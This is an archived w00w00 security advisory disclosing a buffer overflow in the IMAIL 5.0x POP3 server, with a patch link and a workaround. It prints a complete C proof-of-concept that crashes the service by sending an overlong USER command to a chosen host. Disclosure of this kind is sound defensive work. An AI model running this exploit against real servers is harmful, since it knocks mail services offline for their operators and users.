w00w00 Security Development (WSD) [See http://www.datasurge.net/www.w00w00.org until relocation of w00w00.org is complete.] Discovered by: Interrupt (mike@eeye.com) Due to improper bounds checking in Ipswitch's IMAIL POP3 server, a buffer overflow occurs when a lengthy username is sent (via "USER <200-500 character username>"). It has been tested this on version 5.07, 5.05, and 5.06. According to Interrupt, it appears to be a DoS (denial of service) attack, but there has been no further testing to determine if it can be exploited to gain higher privileges. --------------------------------------------------------------------------- Exploit (by Interrupt): /* * IMAIL 5.07 POP3 Overflow * By: Mike@eEye.com * * Demonstrates vulnerability */ #include #include #ifdef WINDOWS #include #include #else #include #include #include #include #endif #ifndef WINDOWS #define SOCKET_ERROR -1 #define closesocket(sock) close(sock) #define WSACleanup() ; #endif char overflow[] = "USER AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n"; int main(int argc, char *argv[]) { #ifdef WINDOWS WSADATA wsaData; #endif struct hostent *hp; struct sockaddr_in sockin; char buf[300], *check; int sockfd, bytes; char *hostname; unsigned short port; if (argc <= 1) { printf("IMAIL POP3 Overflow\n"); printf("By: Mike@eEye.com\n\n"); printf("Usage: %s [hostname] [port]\n", argv[0]); printf("If port is not specified we use '110'\n"); exit(0); } hostname = argv[1]; if (argv[2]) port = atoi(argv[2]); else port = atoi("110"); printf("IMAIL POP3 Overflow\n"); printf("By: Mike@eEye.com\n\n"); #ifdef WINDOWS if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0) { fprintf(stderr, "Error setting up with WinSock v1.1\n"); exit(-1); } #endif hp = gethostbyname(hostname); if (hp == NULL) { printf("ERROR: Uknown host %s\n", hostname); exit(-1); } sockin.sin_family = hp->h_addrtype; sockin.sin_port = htons(port); sockin.sin_addr = *((struct in_addr *)hp->h_addr); if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR) { printf("ERROR: Socket Error\n"); exit(-1); } if ((connect(sockfd, (struct sockaddr *) &sockin, sizeof(sockin))) == SOCKET_ERROR) { printf("ERROR: Connect Error\n"); closesocket(sockfd); WSACleanup(); exit(-1); } printf("Connected to [%s] on port [%d], sending overflow....\n", hostname, port); /* Check to see if we get a +OK error code. If so then proceed. */ if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR) { printf("ERROR: Recv Error\n"); closesocket(sockfd); WSACleanup(); exit(1); } buf[bytes] = '\0'; check = strstr(buf, "+OK"); if (check == NULL) { printf("ERROR: NO +OK response from inital connect\n"); closesocket(sockfd); WSACleanup(); exit(-1); } if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR) { printf("ERROR: Send Error\n"); closesocket(sockfd); WSACleanup(); exit(-1); } printf("Sent.\n"); closesocket(sockfd); WSACleanup(); } --------------------------------------------------------------------------- Patch: Ipswitch has patched the vulnerability and the latest version can be downloaded from: ftp://ftp.ipswitch.com/Ipswitch/Product_Support/IMail/imail508.exe If you are unable to install the patch, a temporary workaround is to set the IMAIL monitor to 10 secons, guaranteeing a quick refreshment period. --------------------------------------------------------------------------- Contributors to w00giving '99: awr, jobe, Sangfroid, rfp, vacuum, interrupt, dmess0r, and K2 People who deserve hellos: nocarrier, minus, daveg, nny, eEye Digital Security, SecurITeam, dark spyrit (of beavuh), and w00god blake w00sites that deserve mentioning: http://www.eEye.com http://www.napster.com http://www.technotronic.com htttp://www.beavuh.org http://www.securiteam.com